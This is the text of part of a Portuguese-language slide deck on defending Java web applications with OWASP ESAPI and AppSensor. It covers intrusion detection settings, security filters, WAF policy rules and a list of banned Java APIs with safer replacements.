150 Configurando Intrusion Detector • É permitido definir múltiplas ações separadas por vírgulas ex: event.test.actions=log,disable • É permitido criar eventos e monitorá-los, para isto basta que o nomes dos eventos criados pelos usuários possuam o prefixo "IntrusionDetector.event.", da seguinte forma: • Para disparar o evento, basta realizar a chamada, associando o nome do evento definido: (...) # # Use IntrusionDetector.addEvent( "test" ) in your code to trigger "event.test" here IntrusionDetector.event.test.count=2 IntrusionDetector.event.test.interval=10 IntrusionDetector.event.test.actions=disable,log (...) ESAPI.intrusionDetector().addEvent( "test" );
151 Configurando o Intrusion Detector (...) #=========================================================================== # ESAPI Intrusion Detection # IntrusionDetector.Disable=false # # Use IntrusionDetector.addEvent( "test" ) in your code to trigger "event.test" here IntrusionDetector.event.test.count=2 IntrusionDetector.event.test.interval=10 IntrusionDetector.event.test.actions=disable,log # Exception Events # any intrusion is an attack IntrusionDetector.org.owasp.esapi.errors.IntrusionException.count=1 IntrusionDetector.org.owasp.esapi.errors.IntrusionException.interval=1 IntrusionDetector.org.owasp.esapi.errors.IntrusionException.actions=log,disable,logout # sessions jumping between hosts indicates session hijacking IntrusionDetector.org.owasp.esapi.errors.AuthenticationHostException.count=2 IntrusionDetector.org.owasp.esapi.errors.AuthenticationHostException.interval=10 IntrusionDetector.org.owasp.esapi.errors.AuthenticationHostException.actions=log,logout (...)
152 OWASP AppSensor • Projeto complementar da OWASP que possui uma implementação que substitui a implementação padrão de referência do IntrusionDetector da biblioteca ESAPI • Assim como o IntrusionDetector, o seu papel é monitorar as requisições e realizar ações pré-configuradas. Fonte: Michael Coates, AppSensor: Real Time Defenses, OWASP Foundation
153 OWASP AppSensor • Contém um conjunto complementar de verificações previstas que não existiam, como: – Tentativas de modificar parâmetros POST para acessar objetos diretamente – Tentativa de Cross Site Scripting – Comando HTTP Inesperados – Tentativa de invocar método HTTP não suportado
154 OWASP AppSensor • Pontos de detecção: – RequestException – AuthenticationException – SessionException – AccessControlException – InputException – EncodingException – CommandInjectionException – FileIOException – Honey Trap – UserTrendException – SystemTrendException – Reputation
155 OWASP AppSensor • Contém um conjunto complementar de ações de resposta que não existem no DefaultIntrusionDetector, como: – disableComponent – bloqueia o acesso ao componente a todos os usuários que foi invocado para realizar a intrusão usando o AppSensorServiceController – disableComponentForUser – bloqueia o acesso ao componente que foi invocado para realizar a tentativa de intrusão apenas para o usuário logado (se existir) usando o AppSensorServiceController – emailAdmin – envia um Email para o administrador notificando qual ação maliciosa ocorreu – smsAdmin – envia um SMS para o administrador (via email para a conta sms) notificando qual ação maliciosa ocorreu
156 Incorporando AppSensor (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) (...) ESAPI.AccessControl=org.owasp.esapi.reference.DefaultAccessController ESAPI.Authenticator=org.owasp.esapi.reference.FileBasedAuthenticator ESAPI.Encoder=org.owasp.esapi.reference.DefaultEncoder ESAPI.Encryptor=org.owasp.esapi.reference.JavaEncryptor ESAPI.CipherText=org.owasp.esapi.reference.DefaultCipherText ESAPI.PreferredJCEProvider=SunJCE ESAPI.Executor=org.owasp.esapi.reference.DefaultExecutor ESAPI.HTTPUtilities=org.owasp.esapi.reference.DefaultHTTPUtilities ESAPI.IntrusionDetector=org.owasp.esapi.reference.DefaultIntrusionDetector ESAPI.IntrusionDetector=org.owasp.appsensor.intrusiondetection.AppSensorIntrusionDetector ESAPI.Logger=org.owasp.esapi.reference.Log4JLogFactory ESAPI.Randomizer=org.owasp.esapi.reference.DefaultRandomizer ESAPI.Validator=org.owasp.esapi.reference.DefaultValidator (...) ESAPI.properties Configuração Original ESAPI.properties Configuração Modificada
157 Incorporando AppSensor • Arquivo de configuração (ESAPI.properties) exige mais parâmetros para configurar as novas ações. (...) #=========================================================================== #AppSensor IntrusionDetector.Total.count=10 IntrusionDetector.Total.interval=20 IntrusionDetector.Total.actions=log,logout,disable #no way to get this custom value via esapi IntrusionDetector.Total.custom=20 #http://www.owasp.org/index.php/AppSensor_DetectionPoints#ACE2:_Modifying_Parameters_Within_A_POST_For_Direct_Object _Access_Attempts IntrusionDetector.ACE2.count=3 IntrusionDetector.ACE2.interval=3 IntrusionDetector.ACE2.actions=log,logout,disable,disableComponent # some integer - duration of time to disable IntrusionDetector.ACE2.disableComponent.duration=30 # some measure of time, currently supported are s,m,h,d (second, minute, hour, day) IntrusionDetector.ACE2.disableComponent.timeScale=m # some integer - duration of time to disable IntrusionDetector.ACE2.disableComponentForUser.duration=30 # some measure of time, currently supported are s,m,h,d (second, minute, hour, day) IntrusionDetector.ACE2.disableComponentForUser.timeScale=m (...)
158 Filtros ESAPI • A ESAPI emprega filtros para realizar uma série de controles de segurança e ações úteis, incluindo autenticação e proteção contra ataques CSRF. • Filtros: –ESAPIFilter – Filtro da ESAPI que realiza algumas verificações básicas –WebApplicationFirewallFilter – Implementa a funcionalidade de firewall de aplicação –ESAPIRequestRateThrottleFilter – Restringe a quantidade de requisições por usuário
159 Filtros ESAPI • Outros filtros: –GZIPFilter – Verifica se o browser suporta compressão com Gzip e usa a compressão dos dados de retorno com gzip –LoginFilter – Intercepta requisições de login para implementar a funcionalidade "Remember Me" –ClickjackFilter – Filtra quais páginas não podem receber frames internos, podendo ser configurado no web.xml com as seguintes opções: » DENY – Nenhum frame interno é permitido para as páginas filtradas, mesmo que sejam da própria aplicação » SAMEORIGIN – É permitido frames internos nas páginas filtradas que referenciam apenas as páginas internas da própria aplicação
160 Filtros ESAPI • Configurando ClickJackFilter: – Modo DENY – Modo SAMEORIGIN <filter> <filter-name>ClickjackFilterDeny</filter-name> <filter-class>org.owasp.filters.ClickjackFilter</filter-class> <init-param> <param-name>mode</param-name> <param-value>DENY</param-value> </init-param> </filter> <filter> <filter-name>ClickjackFilterSameOrigin</filter-name> <filter-class>org.owasp.filters.ClickjackFilter</filter-class> <init-param> <param-name>mode</param-name> <param-value>SAMEORIGIN</param-value> </init-param> </filter>
161 ESAPI Filter • Serve como implementação de referência • Realiza verificação de controle de token CSRF na URL • Realiza verificação de autenticação do Usuário • Define flags para não fazer cache dos cabeçalhos ESAPI.authenticator().login(request, response); ESAPI.httpUtilities().checkCSRFToken(); ESAPI.httpUtilities().setNoCacheHeaders( response );
162 ESAPI Filter • Realiza log (o array obfuscate contém uma lista de parametros que não devem ser registrado em log → password) • Realiza o controle de acesso às URLs • Faz a ligação com o request/response ESAPI.accessController().isAuthorizedForURL(request.getRequestURI()) ESAPI.httpUtilities().logHTTPRequest(request, logger, Arrays.asList(obfuscate)); ESAPI.httpUtilities().setCurrentHTTP(request, response);
163 ESAPI WAF - Web Application Firewall • Configurado por arquivo de configuração policy.xml, onde é possível definir: –Virtual patches –Mecanismo que garante a autenticação –Mecanismo que garante o controle de acesso –Mecanismo que realiza a filtragem/detecção de saída de dados –Mecanismo que força o uso de HTTPS –entre outros...
164 ESAPI WAF - Web Application Firewall Fonte: ESAPI documentation
165 ESAPI WAF - Web Application Firewall • Esqueleto do arquivo policy.xml, onde é possível definir: –Aliases –Settings <?xml version="1.0" encoding="UTF-8"?> <policy> <aliases></aliases> <settings></settings> </policy>
166 ESAPI WAF - Web Application Firewall • Definindo aliases <?xml version="1.0" encoding="UTF-8"?> <policy> <aliases> <alias name="ADMIN_PATH" type="regex">^/admin/.*</alias> </aliases> <settings></settings> </policy>
167 ESAPI WAF - Web Application Firewall • Definindo ações: »redirect – redireciona para página de erro »block – pára o processamento e retorna uma página em branco »log – realiza o log da operação <?xml version="1.0" encoding="UTF-8"?> <policy> <aliases></aliases> <settings> <mode>block</mode> <session-cookie-name>JSESSIONID</session-cookie-name> <error-handling> <default-redirect-page>/error.jsp</default-redirect-page> <block-status>500</block-status> </error-handling> </settings> </policy>
168 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <virtual-patches> <virtual-patch id="1234" path="/foo.jsp" variable="request.parameters.bar" pattern="[0-9a-zA-Z]" message="Ataque xyz" /> </virtual-patches> </policy> • Algumas tags úteis: <virtual-patches … > – Criando virtual patches » São úteis para criar proteções urgentes que previnem contra ameaças recém descobertas e que a mudança em código é demorada ou está impossibilitada
169 ESAPI WAF - Web Application Firewall • Algumas tags úteis: <restrict-source-ip … > – Restringindo os IPs que acessam determinado path <?xml version="1.0" encoding="UTF-8"?> <policy> <authorization-rules> <restrict-source-ip type="regex" ip-header="X-ORIGINAL-IP" Ip-regex="(192.168.1..*|127.0.0.1)" >/admin/.*</restrict-source-ip> </authorization-rules> </policy>
170 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <authorization-rules> <must-match path="^/admin/.*" variable="session.org.acme.user.roles" operator="inList" value="admin" /> <must-match path="^/admin/.*" variable="request.headers.X-ROLES" operator="contains" value="admin" /> </authorization-rules> </policy> • Algumas tags úteis: <must-match … > – Exigindo determinado valor em variáveis de sessão/requisição (cabeçalho HTTP) equals exists inList contains
171 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <url-rules> <restrict-extension deny=".java" /> <restrict-method deny="GET" path=".*.do$" /> <restrict-method allow="^(GET|POST|HEAD)$" /> </url-rules> </policy> • Algumas tags úteis: <restrict-extension … > e <restrict-method … > – Restringindo acesso a determinada extensão de arquivo – Restringindo ou autorizando métodos GET/POST/HEAD
172 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <url-rules> <enforce-https path="/.*"> <path-exception>/index.html</path-exception> <path-exception type="regex">/images/.*</path-exception> <path-exception type="regex">/help/.*</path-exception> </enforce-https> </url-rules> </policy> • Algumas tags úteis: <enforce-https … > – Força o uso do HTTPs e permite definir páginas de exceção, onde o uso do HTTPs não é obrigatório URLs que são exceção à regra e não deve exigir HTTPs para elas
173 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <url-rules> <header-rules> <restrict-user-agent deny=".*GoogleBot.*" /> <restrict-user-agent allow=".*" /> </header-rules> </url-rules> </policy> • Algumas tags úteis: <restrict-user-agent … > – Restringindo o client (user-agent) » No exemplo abaixo o bot do Google que realiza a busca e indexação dentro dos sites está sendo bloqueado
174 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <outbound-rules> <add-secure-flag> <cookie name=".*"/> </add-secure-flag> </outbound-rules> </policy> • Algumas tags úteis: <add-secure-flag … > – Adicionando flag “secure-flag” nos cookies
175 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <outbound-rules> <bean-shell-rules> <bean-shell-script id="example1" file="src/WAF/bean-shell-rule.bsh" stage="before-request-body"/> </bean-shell-rules> </outbound-rules> </policy> • Algumas tags úteis: <bean-shell-script … > – Executando scripts beanshell before-request-body after-request-body before-response
176 ESAPI WAF - Web Application Firewall <?xml version="1.0" encoding="UTF-8"?> <policy> <outbound-rules> <bean-shell-rules> <bean-shell-script id="example1" file="src/WAF/bean-shell-rule.bsh" stage="before-request-body"/> </bean-shell-rules> </outbound-rules> </policy> • Algumas tags úteis: <bean-shell-script … > – Executando scripts em beanshell que podem executar operações pré-definidas import org.owasp.esapi.waf.actions.*; session.setAttribute("simple_waf_test", "true"); action = new RedirectAction(); BlockAction DefaultAction DoNothingAction RedirectAction
177 ESAPI Request Rate Throttle • É um filtro que limita a taxa de requisições para um certo limite de requisições por segundo • A taxa padrão é 5 hits a cada 10 segundos • A taxa pode ser redefinida ao adicionar parâmetros no arquivo web.xml com o nome "hits" e "period" com os valores desejados
178 ESAPI Request Rate Throttle <filter> <filter-name>RequestRateThrottleFilter</filter-name> <filter-class>org.owasp.esapi.filters.RequestRateThrottleFilter</filter-class> <init-param> <param-name>hits</param-name> <param-value>10</param-value> </init-param> <init-param> <param-name>period</param-name> <param-value>15</param-value> </init-param> </filter> <filter-mapping> <filter-name>RequestRateThrottleFilter</filter-name> <url-pattern>/*</url-pattern> </filter-mapping> • Configuração com a definição dos parâmetros hits e period no arquivo web.xml
179 Vantagens do Uso da Biblioteca ESAPI  ESAPI x OWASP Top Ten
180 Vantagens do Uso da Biblioteca ESAPI Programa de Segurança de Aplicações envolve: • Treinamento em Segurança de Aplicações • Ciclo de vida de desenvolvimento seguro • Guias e padrões de segurança em aplicações • Inventário e Métricas de segurança em aplicações Hipóteses • 1000 aplicações, muitas tecnologias, algumas terceirizadas • 300 desenvolvedores, 10 aulas de treinamento por ano • 50 novos projetos de aplicações por ano • Equipe de segurança de aplicações pequena  Potenciais redução de custos da empresa Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
181 Vantagens do Uso da Biblioteca ESAPI  Estimativa de custos para tratar XSS Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
182 Vantagens do Uso da Biblioteca ESAPI  Potencial de redução de custos da organização com a ESAPI Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
183 Vantagens do Uso da Biblioteca ESAPI  Potencial de redução de custos da organização com a ESAPI Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs
184 Overview de APIs Java banidas Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs System.out.println() → Logger.* Throwable.printStackTrace() → Logger.* Runtime.exec() → Executor.safeExec() Reader.readLine() → Validator.safeReadLine() Session.getId() → Randomizer.getRandomString() (better not to use at all) ServletRequest.getUserPrincipal() → Authenticator.getCurrentUser() ServletRequest.isUserInRole() → AccessController.isAuthorized*() Session.invalidate() → Authenticator.logout() Math.Random.* → Randomizer.* File.createTempFile() → Randomizer.getRandomFilename() ServletResponse.setContentType() → HTTPUtilities.setContentType() ServletResponse.sendRedirect() → HTTPUtilities.sendSafeRedirect()
185 Overview de APIs Java banidas Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs RequestDispatcher.forward() → HTTPUtilities.sendSafeForward() ServletResponse.addHeader() → HTTPUtilities.addSafeHeader() ServletResponse.addCookie() → HTTPUtilities.addSafeCookie() ServletRequest.isSecure() → HTTPUtilties.isSecureChannel() Properties.* → EncryptedProperties.* ServletContext.log() → Logger.* java.security and javax.crypto → Encryptor.* java.net.URLEncoder/Decoder → Encoder.encodeForURL/decodeForURL java.sql.Statement.execute → PreparedStatement.execute ServletResponse.encodeURL → HTTPUtilities.safeEncodeURL (better not to use at all) ServletResponse.encodeRedirectURL → HTTPUtilities.safeEncodeRedirectURL (better not to use at all)
Summary & Conclusion
187 Conclusões Considerações Finais: • A ESAPI auxilia no reuso e integração dos controles de segurança para desenvolver aplicações seguras, porém existe a necessidade de criar processos que vão além do código fonte da aplicação, envolvendo: – Análise de riscos de segurança de aplicações Web – Processo de codificação segura
188 Conclusões Considerações Finais: • A razão pela qual criamos princípios de segurança no desenvolvimento é ajudar os desenvolvedores a construírem aplicações seguras e não apenas para evitar as vulnerabilidades mais comuns atualmente. • Este provérbio resume esta ideia: “Ensinar o desenvolvedor a se prevenir contra uma determinada vulnerabilidade fará com que ele se previna dela. Ensiná-lo a desenvolver de forma segura fará com que ele se previna de muitas vulnerabilidades.”
189 Referências DOM Based Cross Site Scripting or XSS of the Third Kind http://www.webappsec.org/projects/articles/071105.shtml http://www.owasp.org/index.php/Category:OWASP_Enterprise_Security_API http://en.wikipedia.org/wiki/Canonicalization http://www.securityninja.co.uk/output-validation-using-the-owasp-esapi http://www.securityninja.co.uk/input-validation-using-the-owasp-esapi http://code.google.com/p/owasp-esapi-java/
190 Referências http://www.cgisecurity.com http://www.webappsec.org http://buildsecurityin.us-cert.gov http://www.cert.org http://www.sans.org http://www.securityfocus.com
191 Referências Blogs: http://ha.ckers.org/blog (RSnake) http://shiflett.org (Chris Shiflett) http://jeremiahgrossman.blogspot.com http://www.gnucitizen.org (PDP) http://sylvanvonstuppe.blogspot.com http://www.memestreams.net/users/Acidus (Billy Hoffman) http://taosecurity.blogspot.com (Richard Bejtlich) http://www.dhanjani.com (Nitesh Dhanjani)
192 Referências Vitor Afonso, André Grégio, Paulo Licio de Geus, Segurança Web: Técnicas para Programação Segura de Aplicações, AppSec Brasil, 2009. Chris Schmidt, Solving Real World Problems with ESAPI, FROC 2010 Fonte: Jeff Williams, Establishing an Enterprise Security API to Reduce Application Security Costs, Aspect Security OWASP Esapi for Java EE 2.0a, Web Application Firewall Policy File Specification, alpha, OWASP Foundation.
193 Referências Michael Coates, OWASP AppSensor, V1.1, Detect and Respond to Attacks from within the Application, OWASP Foundation. Michael Coates, AppSensor: Real Time Defenses, OWASP Foundation http://www.owasp.org/index.php/OWASP_AppSensor_Project http://www.owasp.org/index.php/AppSensor_GettingStarted http://www.owasp.org/index.php/AppSensor_Developer_Guide http://www.beanshell.org/docs.html

Mais conteúdo relacionado

PDF
Teste de segurança do lado servidor - Nível 1
porKleitor Franklint Correa Araujo
 
PDF
Introdução de teste de segurança app web
porKleitor Franklint Correa Araujo
 
PPTX
OWASP - Ferramentas
porCarlos Serrao
 
PPTX
Segurança na web
porKaito Queiroz
 
PDF
Palestra em parceria com o @cefet_rj – Auditoria Teste de Invasão em Aplicações
porClavis Segurança da Informação
 
PDF
Testes de segurança em aplicações web
porSynergia - Engenharia de Software e Sistemas
 
PDF
Ferranentas OWASP
porCarlos Serrao
 
PPT
Testes de Segurança de Software (tech-ed 2008)
porConviso Application Security
 
Teste de segurança do lado servidor - Nível 1
porKleitor Franklint Correa Araujo
 
Introdução de teste de segurança app web
porKleitor Franklint Correa Araujo
 
OWASP - Ferramentas
porCarlos Serrao
 
Segurança na web
porKaito Queiroz
 
Palestra em parceria com o @cefet_rj – Auditoria Teste de Invasão em Aplicações
porClavis Segurança da Informação
 
Testes de segurança em aplicações web
porSynergia - Engenharia de Software e Sistemas
 
Ferranentas OWASP
porCarlos Serrao
 
Testes de Segurança de Software (tech-ed 2008)
porConviso Application Security
 

Mais procurados

PPTX
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
porMagno Logan
 
PDF
Teste seguranca aplicacoes web security testing
porCristiano Caetano
 
PDF
Segurança em Aplicações Web conforme OWASP
porFabiano Pereira
 
PPTX
Explorando 5 falhas graves de segurança que todos programadores cometem
porAlcyon Ferreira de Souza Junior, MSc
 
PPTX
Desenvolvimento de Software Seguro
porAugusto Lüdtke
 
PDF
Como Fazer Apps Node.Js Seguras
porPaulo Pires
 
PPTX
CJR Apresenta: OWASP TOP10
porCJR, UnB
 
PDF
Palestra - Desenvolvimento Seguro de Aplicações WEB - IFC 2013-09-29
porcadiego
 
PDF
Segurança em aplicações web: pequenas ideias, grandes resultados
porAlex Camargo
 
PPT
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
porMagno Logan
 
PDF
Você Escreve Código e Quem Valida?
porConviso Application Security
 
PPTX
Teste de segurança em aplicações web ( sites )
porPablo Ribeiro
 
PDF
OWASP_BSB_20120827_TOP10_ISMAELROCHA
porOWASP Brasília
 
PDF
Palestra - Darkmira Tour PHP 2016 - A ilusão das referências sobre desenvolv...
porThiago Dieb
 
PDF
OWASP_BSB_20120827_mod_security_KLAUBERTHERR
porOWASP Brasília
 
PDF
Defensive Programming - by Alcyon Junior
porAlcyon Ferreira de Souza Junior, MSc
 
PPT
Ameacas e Vulnerabilidades em Apps Web-2013
porKleitor Franklint Correa Araujo
 
PDF
Validando a Segurança de Software
porJeronimo Zucco
 
PDF
THE WebSec
porKelvin Campelo
 
PPTX
Java security
porarmeniocardoso
 
AppSec Latam 2011 - Treinamento OWASP Top 10 + JavaEE
porMagno Logan
 
Teste seguranca aplicacoes web security testing
porCristiano Caetano
 
Segurança em Aplicações Web conforme OWASP
porFabiano Pereira
 
Explorando 5 falhas graves de segurança que todos programadores cometem
porAlcyon Ferreira de Souza Junior, MSc
 
Desenvolvimento de Software Seguro
porAugusto Lüdtke
 
Como Fazer Apps Node.Js Seguras
porPaulo Pires
 
CJR Apresenta: OWASP TOP10
porCJR, UnB
 
Palestra - Desenvolvimento Seguro de Aplicações WEB - IFC 2013-09-29
porcadiego
 
Segurança em aplicações web: pequenas ideias, grandes resultados
porAlex Camargo
 
Tratando as vulnerabilidades do Top 10 do OWASP by Wagner Elias
porMagno Logan
 
Você Escreve Código e Quem Valida?
porConviso Application Security
 
Teste de segurança em aplicações web ( sites )
porPablo Ribeiro
 
OWASP_BSB_20120827_TOP10_ISMAELROCHA
porOWASP Brasília
 
Palestra - Darkmira Tour PHP 2016 - A ilusão das referências sobre desenvolv...
porThiago Dieb
 
OWASP_BSB_20120827_mod_security_KLAUBERTHERR
porOWASP Brasília
 
Defensive Programming - by Alcyon Junior
porAlcyon Ferreira de Souza Junior, MSc
 
Ameacas e Vulnerabilidades em Apps Web-2013
porKleitor Franklint Correa Araujo
 
Validando a Segurança de Software
porJeronimo Zucco
 
THE WebSec
porKelvin Campelo
 
Java security
porarmeniocardoso
 

Destaque

PPTX
Um Mecanismo de Proteção Contra a Previsibilidade de Informações em Pacotes
porEduardo Souza
 
ODP
Kt 15 07-2013
porG Jayendra Kartheek
 
PPTX
OAuth1.0
porG Jayendra Kartheek
 
PPTX
OAuth Linking-Social Networks
porG Jayendra Kartheek
 
PDF
OAuth 1.0 vs OAuth 2.0 - Principais diferenças e as razões para a criação de ...
porJoao Alves
 
PPTX
Proteja sua aplicação com o zend framework 2
porCyrille Grandval
 
PDF
OAuth for your API - The Big Picture
porApigee | Google Cloud
 
Um Mecanismo de Proteção Contra a Previsibilidade de Informações em Pacotes
porEduardo Souza
 
Kt 15 07-2013
porG Jayendra Kartheek
 
OAuth1.0
porG Jayendra Kartheek
 
OAuth Linking-Social Networks
porG Jayendra Kartheek
 
OAuth 1.0 vs OAuth 2.0 - Principais diferenças e as razões para a criação de ...
porJoao Alves
 
Proteja sua aplicação com o zend framework 2
porCyrille Grandval
 
OAuth for your API - The Big Picture
porApigee | Google Cloud
 

Semelhante a AppSec Brazil 2010 - Utilizando a ESAPI para prover Segurança em Aplicações Web by Tarcizio Vieira Neto

PDF
Antar ferreira
porAntar Ferreira
 
ODT
OWASP Top 10 2010 pt-BR
porMagno Logan
 
PDF
Global AppSec LATAM 2011 Conference - Segurança de Aplicações, para sua organ...
porRafael Brinhosa
 
PDF
Owasp top 10_2013_pt-br
porSérgio FePro
 
PPT
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
porConviso Application Security
 
PPT
Desenvolvimento Seguro- 2011
porKleitor Franklint Correa Araujo
 
PDF
OWASP Top 10 2010 para JavaEE (pt-BR)
porMagno Logan
 
PPTX
OWASP Top Ten
porGiovani Decusati
 
PPTX
CWI - Núcleo de tecnologia - OWASP Top Ten
porPOANETMeetup
 
PDF
OWASP @ ISCTE-IUL, OWASP e OWASP Portugal
porCarlos Serrao
 
PPTX
Desenvolvimento de Aplicações Web Seguras
porDércio Luiz Reis
 
PDF
ENSOL 2011 - OWASP e a Segurança na Web
porMagno Logan
 
PPTX
Owasp Chapter Belo Horizonte
porMarcelo de Freitas Lopes
 
PPT
Tratando as vulnerabilidades do Top 10 com php
porConviso Application Security
 
PDF
Analysis of vulnerabilities in web applications - LinuxCon Brazil 2010
porLuiz Vieira .´. CISSP, OSCE, GXPN, CEH
 
PDF
Apresentação OWASP - UBI, Covilhã
porCarlos Serrao
 
PDF
Webgoat como ferramenta de aprendizado
porLuiz Vieira .´. CISSP, OSCE, GXPN, CEH
 
PDF
Introdução ao OWASP
porCarlos Serrao
 
PPT
OWASP Top 10 - Experiência e Cases com Auditorias Teste de Invasão em Aplicaç...
porClavis Segurança da Informação
 
PDF
(1) Por que Seguranca de Aplicacoes Web?
porEduardo Lanna
 
Antar ferreira
porAntar Ferreira
 
OWASP Top 10 2010 pt-BR
porMagno Logan
 
Global AppSec LATAM 2011 Conference - Segurança de Aplicações, para sua organ...
porRafael Brinhosa
 
Owasp top 10_2013_pt-br
porSérgio FePro
 
OWASP Top 10 e aplicações .Net - Tech-Ed 2007
porConviso Application Security
 
Desenvolvimento Seguro- 2011
porKleitor Franklint Correa Araujo
 
OWASP Top 10 2010 para JavaEE (pt-BR)
porMagno Logan
 
OWASP Top Ten
porGiovani Decusati
 
CWI - Núcleo de tecnologia - OWASP Top Ten
porPOANETMeetup
 
OWASP @ ISCTE-IUL, OWASP e OWASP Portugal
porCarlos Serrao
 
Desenvolvimento de Aplicações Web Seguras
porDércio Luiz Reis
 
ENSOL 2011 - OWASP e a Segurança na Web
porMagno Logan
 
Owasp Chapter Belo Horizonte
porMarcelo de Freitas Lopes
 
Tratando as vulnerabilidades do Top 10 com php
porConviso Application Security
 
Analysis of vulnerabilities in web applications - LinuxCon Brazil 2010
porLuiz Vieira .´. CISSP, OSCE, GXPN, CEH
 
Apresentação OWASP - UBI, Covilhã
porCarlos Serrao
 
Webgoat como ferramenta de aprendizado
porLuiz Vieira .´. CISSP, OSCE, GXPN, CEH
 
Introdução ao OWASP
porCarlos Serrao
 
OWASP Top 10 - Experiência e Cases com Auditorias Teste de Invasão em Aplicaç...
porClavis Segurança da Informação
 
(1) Por que Seguranca de Aplicacoes Web?
porEduardo Lanna
 

Mais de Magno Logan

PDF
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
porMagno Logan
 
PDF
Katana Security - Consultoria em Segurança da Informação
porMagno Logan
 
PDF
XST - Cross Site Tracing
porMagno Logan
 
PDF
OWASP Top 10 2007 for JavaEE
porMagno Logan
 
PDF
XPath Injection
porMagno Logan
 
PDF
SQL Injection
porMagno Logan
 
PDF
SQL Injection Tutorial
porMagno Logan
 
PPTX
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
porMagno Logan
 
PPTX
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
porMagno Logan
 
PDF
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
porMagno Logan
 
PPT
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
porMagno Logan
 
PDF
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
porMagno Logan
 
PPT
AppSec DC 2009 - Learning by breaking by Chuck Willis
porMagno Logan
 
PDF
Just4Meeting 2012 - How to protect your web applications
porMagno Logan
 
PPTX
GTS 17 - OWASP em prol de um mundo mais seguro
porMagno Logan
 
PDF
BHack 2012 - How to protect your web applications
porMagno Logan
 
PDF
AppSec Latam 2011 - Segurança em Sites de Compras Coletivas
porMagno Logan
 
DevSecOps - Integrating Security in the Development Process (with memes) - Ma...
porMagno Logan
 
Katana Security - Consultoria em Segurança da Informação
porMagno Logan
 
XST - Cross Site Tracing
porMagno Logan
 
OWASP Top 10 2007 for JavaEE
porMagno Logan
 
XPath Injection
porMagno Logan
 
SQL Injection
porMagno Logan
 
SQL Injection Tutorial
porMagno Logan
 
Mutillidae and the OWASP Top 10 by Adrian Crenshaw aka Irongeek
porMagno Logan
 
Co0L 2011 - Segurança em Sites de Compras Coletivas: Vulnerabilidades, Ataqu...
porMagno Logan
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
porMagno Logan
 
AppSec EU 2011 - An Introduction to ZAP by Simon Bennetts
porMagno Logan
 
OWASP Floripa - Web Spiders: Automação para Web Hacking by Antonio Costa aka ...
porMagno Logan
 
AppSec DC 2009 - Learning by breaking by Chuck Willis
porMagno Logan
 
Just4Meeting 2012 - How to protect your web applications
porMagno Logan
 
GTS 17 - OWASP em prol de um mundo mais seguro
porMagno Logan
 
BHack 2012 - How to protect your web applications
porMagno Logan
 
AppSec Latam 2011 - Segurança em Sites de Compras Coletivas
porMagno Logan
 

Último

PPTX
pt-BR_Google Cloud Computing Foundations M9_ You Have the Data but What Are Y...
porArlimar Jacinto
 
PDF
Global_Innovation_Tour_in_Silicon_Valley_&_RSA_2026
porOBr.global
 
PPT
redes_Ind_topologias estrutura de dados.ppt
porbacasandro2024
 
PPTX
SEQUENCIA DE PARTIDA DE QUEIMADORES INDUSTRIAIS
porantonskyrda
 
PPTX
Impacto das micotoxinas na alimentação de bovinos
pordavifrancisco9
 
PDF
COLHEITA, ARMAZENAMENTO, COMERCIALIZAÇÃO E INDUSTRIALIZAÇÃO DA SOJA - FELIPE ...
porGETA - UFG
 
PDF
COLHEITA, ARMAZENAMENTO, COMERCIALIZAÇÃO E INDUSTRIALIZAÇÃO DO MILHO – JULIA ...
porGETA - UFG
 
PDF
Um projeto de redes para fins educacionais
porLorran17
 
PPTX
IA, Machine Learning e Deep Learning.pptx
porArlimar Jacinto
 
PPTX
API e Endpoints para Google Cloud para IA
porArlimar Jacinto
 
PDF
Gerenciamento-de-Portfolio-de-Projetos.pdf
porAragon Salvador
 
PDF
Dev In The Loop - Quando e Como o Desenvolvedor Atua no Ciclo de Desenvolvime...
porDouglas Siviotti
 
PDF
MODOS DE AÇÃO DOS FUNGICIDAS - JÚLIA E DIEGO
porGETA - UFG
 
PDF
FISIOLOGIA E FENOLOGIA DO MILHO - FELIPE CRUVINEL E CAIRO
porGETA - UFG
 
pt-BR_Google Cloud Computing Foundations M9_ You Have the Data but What Are Y...
porArlimar Jacinto
 
